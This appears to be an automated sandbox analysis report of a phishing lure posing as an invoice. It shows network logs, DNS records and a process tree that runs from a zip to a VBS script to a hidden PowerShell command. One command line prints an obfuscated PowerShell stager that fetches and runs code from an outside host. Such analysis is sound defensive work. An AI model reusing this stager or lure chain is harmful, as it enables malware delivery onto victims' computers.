                                                                                    Mar 13, 2025 14:59:09.194749117 CET53504821.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:59:09.634428024 CET53504821.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:59:09.635759115 CET5048253192.168.2.71.1.1.1
                                                                                    Mar 13, 2025 14:59:09.640615940 CET53504821.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:59:09.640687943 CET5048253192.168.2.71.1.1.1
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Mar 13, 2025 14:56:47.223436117 CET53554901.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:56:47.224668980 CET53523431.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:56:50.139547110 CET53622371.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:56:50.431256056 CET53514781.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:56:51.554388046 CET5735453192.168.2.71.1.1.1
                                                                                    Mar 13, 2025 14:56:51.554629087 CET5171553192.168.2.71.1.1.1
                                                                                    Mar 13, 2025 14:56:51.561223984 CET53517151.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:56:51.561249018 CET53573541.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:56:52.931272030 CET6415553192.168.2.71.1.1.1
                                                                                    Mar 13, 2025 14:56:52.931552887 CET6431753192.168.2.71.1.1.1
                                                                                    Mar 13, 2025 14:56:52.938672066 CET53641551.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:56:52.939366102 CET53643171.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:56:54.080761909 CET6409653192.168.2.71.1.1.1
                                                                                    Mar 13, 2025 14:56:54.080960035 CET5116053192.168.2.71.1.1.1
                                                                                    Mar 13, 2025 14:56:54.090686083 CET53640961.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:56:54.110677958 CET53511601.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:57:08.011280060 CET53642781.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:57:20.464127064 CET5408753192.168.2.71.1.1.1
                                                                                    Mar 13, 2025 14:57:20.471023083 CET53540871.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:57:24.047461987 CET5557253192.168.2.71.1.1.1
                                                                                    Mar 13, 2025 14:57:24.087903023 CET53555721.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:57:26.732479095 CET53514291.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:57:46.766768932 CET53655001.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:57:49.529953957 CET53583111.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:57:51.548337936 CET53579531.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:58:19.456320047 CET53511991.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:58:26.733803988 CET138138192.168.2.7192.168.2.255
                                                                                    Mar 13, 2025 14:59:05.139033079 CET53642581.1.1.1192.168.2.7
                                                                                    Mar 13, 2025 14:59:09.184607029 CET53631301.1.1.1192.168.2.7
                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                    Mar 13, 2025 14:56:54.110764980 CET192.168.2.71.1.1.1c237(Port unreachable)Destination Unreachable

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Mar 13, 2025 14:56:51.554388046 CET192.168.2.71.1.1.10x29abStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:51.554629087 CET192.168.2.71.1.1.10xbbaeStandard query (0)www.google.com65IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.931272030 CET192.168.2.71.1.1.10xa95bStandard query (0)s4.histats.comA (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.931552887 CET192.168.2.71.1.1.10xa12eStandard query (0)s4.histats.com65IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:54.080761909 CET192.168.2.71.1.1.10x7bbfStandard query (0)filehost200885.infoA (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:54.080960035 CET192.168.2.71.1.1.10xcd45Standard query (0)_13621._https.filehost200885.info65IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:20.464127064 CET192.168.2.71.1.1.10xe594Standard query (0)s4.histats.comA (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:24.047461987 CET192.168.2.71.1.1.10x96d2Standard query (0)filehost200885.infoA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Mar 13, 2025 14:56:51.561223984 CET1.1.1.1192.168.2.70xbbaeNo error (0)www.google.com65IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:51.561249018 CET1.1.1.1192.168.2.70x29abNo error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.938672066 CET1.1.1.1192.168.2.70xa95bNo error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.938672066 CET1.1.1.1192.168.2.70xa95bNo error (0)s4.histats.com54.39.128.162A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.938672066 CET1.1.1.1192.168.2.70xa95bNo error (0)s4.histats.com142.4.219.198A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.938672066 CET1.1.1.1192.168.2.70xa95bNo error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.938672066 CET1.1.1.1192.168.2.70xa95bNo error (0)s4.histats.com54.39.156.32A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.938672066 CET1.1.1.1192.168.2.70xa95bNo error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.938672066 CET1.1.1.1192.168.2.70xa95bNo error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.938672066 CET1.1.1.1192.168.2.70xa95bNo error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.938672066 CET1.1.1.1192.168.2.70xa95bNo error (0)s4.histats.com149.56.240.131A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.938672066 CET1.1.1.1192.168.2.70xa95bNo error (0)s4.histats.com149.56.240.27A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.938672066 CET1.1.1.1192.168.2.70xa95bNo error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.938672066 CET1.1.1.1192.168.2.70xa95bNo error (0)s4.histats.com158.69.254.144A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:52.938672066 CET1.1.1.1192.168.2.70xa95bNo error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:54.090686083 CET1.1.1.1192.168.2.70x7bbfNo error (0)filehost200885.info156.229.228.198A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:56:54.110677958 CET1.1.1.1192.168.2.70xcd45Name error (3)_13621._https.filehost200885.infononenone65IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:20.471023083 CET1.1.1.1192.168.2.70xe594No error (0)s4.histats.com54.39.128.117A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:20.471023083 CET1.1.1.1192.168.2.70xe594No error (0)s4.histats.com54.39.156.32A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:20.471023083 CET1.1.1.1192.168.2.70xe594No error (0)s4.histats.com149.56.240.128A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:20.471023083 CET1.1.1.1192.168.2.70xe594No error (0)s4.histats.com158.69.254.144A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:20.471023083 CET1.1.1.1192.168.2.70xe594No error (0)s4.histats.com149.56.240.132A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:20.471023083 CET1.1.1.1192.168.2.70xe594No error (0)s4.histats.com149.56.240.127A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:20.471023083 CET1.1.1.1192.168.2.70xe594No error (0)s4.histats.com149.56.240.130A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:20.471023083 CET1.1.1.1192.168.2.70xe594No error (0)s4.histats.com54.39.128.162A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:20.471023083 CET1.1.1.1192.168.2.70xe594No error (0)s4.histats.com149.56.240.131A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:20.471023083 CET1.1.1.1192.168.2.70xe594No error (0)s4.histats.com142.4.219.198A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:20.471023083 CET1.1.1.1192.168.2.70xe594No error (0)s4.histats.com149.56.240.31A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:20.471023083 CET1.1.1.1192.168.2.70xe594No error (0)s4.histats.com149.56.240.129A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:20.471023083 CET1.1.1.1192.168.2.70xe594No error (0)s4.histats.com149.56.240.27A (IP address)IN (0x0001)false
                                                                                    Mar 13, 2025 14:57:24.087903023 CET1.1.1.1192.168.2.70x96d2No error (0)filehost200885.info156.229.228.198A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • s4.histats.com

                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.749692149.56.240.1324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-13 13:56:54 UTC795OUTGET /stats/0.php?4935987&@f16&@g1&@h1&@i1&@vhttps://histats.com/s_opened_TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEzNC4wLjAuMCBTYWZhcmkvNTM3LjM2 HTTP/1.1
                                                                                    Host: s4.histats.com
                                                                                    Connection: keep-alive
                                                                                    sec-ch-ua-platform: "Windows"
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                    sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                    sec-ch-ua-mobile: ?0
                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                    Sec-Fetch-Site: cross-site
                                                                                    Sec-Fetch-Mode: no-cors
                                                                                    Sec-Fetch-Dest: image
                                                                                    Sec-Fetch-Storage-Access: active
                                                                                    Accept-Encoding: gzip, deflate, br, zstd
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    2025-03-13 13:56:55 UTC135INHTTP/1.1 200 OK
                                                                                    Date: Thu, 13 Mar 2025 13:56:53 GMT
                                                                                    Content-Type: text/html;charset=UTF-8
                                                                                    Content-Length: 376
                                                                                    Connection: close
                                                                                    2025-03-13 13:56:55 UTC376INData Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 2e 2e 22 3b 63 68 66 68 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 79 6e 63 22
                                                                                    Data Ascii: _HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="async"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.74970554.39.128.1174436860C:\Windows\SysWOW64\wscript.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-13 13:57:22 UTC365OUTGET /stats/0.php?4935988&@f16&@g1&@h1&@i1&@vhttps://histats.com/d_opened HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Language: en-ch
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                    Host: s4.histats.com
                                                                                    Connection: Keep-Alive
                                                                                    2025-03-13 13:57:22 UTC135INHTTP/1.1 200 OK
                                                                                    Date: Thu, 13 Mar 2025 13:57:06 GMT
                                                                                    Content-Type: text/html;charset=UTF-8
                                                                                    Content-Length: 376
                                                                                    Connection: close
                                                                                    2025-03-13 13:57:22 UTC376INData Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 49 6e 69 74 69 61 6c 69 7a 69 6e 67 2e 2e 22 3b 63 68 66 68 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 79 6e 63 22
                                                                                    Data Ascii: _HST_cntval="Initializing..";chfh(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="async"


                                                                                    Statistics

                                                                                    CPU Usage

                                                                                    Click to jump to process

                                                                                    Memory Usage

                                                                                    Click to jump to process

                                                                                    High Level Behavior Distribution

                                                                                    • File
                                                                                    • Registry

                                                                                    Click to dive into process behavior distribution

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

                                                                                    Target ID:0
                                                                                    Start time:09:56:44
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                    Imagebase:0x7ff778810000
                                                                                    File size:3'388'000 bytes
                                                                                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false
                                                                                    Show Windows behavior

                                                                                    File Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    COM Activities

                                                                                    Show Windows behavior

                                                                                    Process Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Memory Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Process Token Activities


                                                                                    General

                                                                                    Target ID:1
                                                                                    Start time:09:56:45
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2060,i,3895141347888249468,9556767451129423605,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2104 /prefetch:3
                                                                                    Imagebase:0x7ff778810000
                                                                                    File size:3'388'000 bytes
                                                                                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false
                                                                                    Show Windows behavior

                                                                                    File Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Memory Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                    General

                                                                                    Target ID:4
                                                                                    Start time:09:56:51
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\faktura_FV2025020660849.html"
                                                                                    Imagebase:0x7ff778810000
                                                                                    File size:3'388'000 bytes
                                                                                    MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                    General

                                                                                    Target ID:6
                                                                                    Start time:09:56:56
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Windows\SysWOW64\unarchiver.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\faktura_FV2025020660849.zip"
                                                                                    Imagebase:0xcc0000
                                                                                    File size:12'800 bytes
                                                                                    MD5 hash:16FF3CC6CC330A08EED70CBC1D35F5D2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false
                                                                                    Show Windows behavior

                                                                                    File Activities

                                                                                    Show Windows behavior

                                                                                    Section Activities

                                                                                    Show Windows behavior

                                                                                    Registry Activities

                                                                                    Show Windows behavior

                                                                                    Mutex Activities

                                                                                    Show Windows behavior

                                                                                    Process Activities

                                                                                    Show Windows behavior

                                                                                    Thread Activities

                                                                                    Show Windows behavior

                                                                                    Memory Activities

                                                                                    Show Windows behavior

                                                                                    System Activities


                                                                                    General

                                                                                    Target ID:7
                                                                                    Start time:09:56:56
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Windows\SysWOW64\7za.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg" "C:\Users\user\Downloads\faktura_FV2025020660849.zip"
                                                                                    Imagebase:0x400000
                                                                                    File size:289'792 bytes
                                                                                    MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true
                                                                                    Show Windows behavior

                                                                                    File Activities

                                                                                    Show Windows behavior

                                                                                    Section Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Thread Activities

                                                                                    Show Windows behavior

                                                                                    Memory Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                    Process Token Activities


                                                                                    General

                                                                                    Target ID:8
                                                                                    Start time:09:56:56
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff642da0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true
                                                                                    Show Windows behavior

                                                                                    File Activities

                                                                                    Show Windows behavior

                                                                                    Section Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Mutex Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Thread Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                    General

                                                                                    Target ID:9
                                                                                    Start time:09:56:57
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"cmd.exe" /C "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs"
                                                                                    Imagebase:0x460000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false
                                                                                    Show Windows behavior

                                                                                    File Activities

                                                                                    Show Windows behavior

                                                                                    Section Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Process Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Memory Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                    General

                                                                                    Target ID:10
                                                                                    Start time:09:56:57
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff642da0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false
                                                                                    Show Windows behavior

                                                                                    File Activities

                                                                                    Show Windows behavior

                                                                                    Section Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Thread Activities

                                                                                    Show Windows behavior

                                                                                    Memory Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                    General

                                                                                    Target ID:11
                                                                                    Start time:09:56:57
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\gqoox5ke.wxg\2025020665304.vbs"
                                                                                    Imagebase:0xa40000
                                                                                    File size:147'456 bytes
                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false
                                                                                    Show Windows behavior

                                                                                    File Activities

                                                                                    Show Windows behavior

                                                                                    Section Activities

                                                                                    Show Windows behavior

                                                                                    Registry Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Thread Activities

                                                                                    Show Windows behavior

                                                                                    Memory Activities

                                                                                    Show Windows behavior

                                                                                    System Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Windows UI Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                    General

                                                                                    Target ID:13
                                                                                    Start time:09:57:21
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "echo $($uNteWVUN = $('{7}{5}{6}' -f $('VJJLWexieN'.ToCharArray())); $((364,312,404,464,184,332,404,456,472,420,396,404,320,444,420,440,464,308,388,440,388,412,404,456,372,232,232,332,404,456,472,404,456,268,404,456,464,420,408,420,396,388,464,404,344,388,432,420,400,388,464,420,444,440,268,388,432,432,392,388,396,428,128,244,128,492,144,464,456,468,404,500,236,128,144,468,304,456,312,400,468,296,296,448,348,128,244,128,364,332,484,460,464,404,436,184,312,404,464,184,288,464,464,448,348,404,392,328,404,452,468,404,460,464,372,232,232,268,456,404,388,464,404,160,156,416,464,464,448,460,232,188,188,408,420,432,404,416,444,460,464,200,192,192,224,224,212,184,420,440,408,444,232,196,204,216,200,196,188,476,404,392,212,184,448,416,448,156,164,236,128,144,468,304,456,312,400,468,296,296,448,348,184,336,420,436,404,444,468,464,128,244,128,204,192,192,192,192,192,236,128,144,160,364,332,484,460,464,404,436,184,292,444,184,332,464,456,404,388,436,328,404,388,400,404,456,372,160,144,468,304,456,312,400,468,296,296,448,348,184,284,404,464,328,404,460,448,444,440,460,404,160,164,184,284,404,464,328,404,460,448,444,440,460,404,332,464,456,404,388,436,160,164,164,164,184,328,404,388,400,336,444,276,440,400,160,164,128,496,128,292,276,352)^^^|%{[char]($_/4)})-join'') ^^^| ^^^&($uNteWVUN) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -Window Hidden -c -"
                                                                                    Imagebase:0x460000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true
                                                                                    Show Windows behavior

                                                                                    File Activities

                                                                                    Show Windows behavior

                                                                                    Section Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Process Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                    Show Windows behavior

                                                                                    Memory Activities

                                                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                    General

                                                                                    Target ID:14
                                                                                    Start time:09:57:21
                                                                                    Start date:13/03/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff642da0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true
                                                                                    Show Windows behavior

                                                                                    File Activities

                                                                                    Show Windows behavior

                                                                                    Section Activities

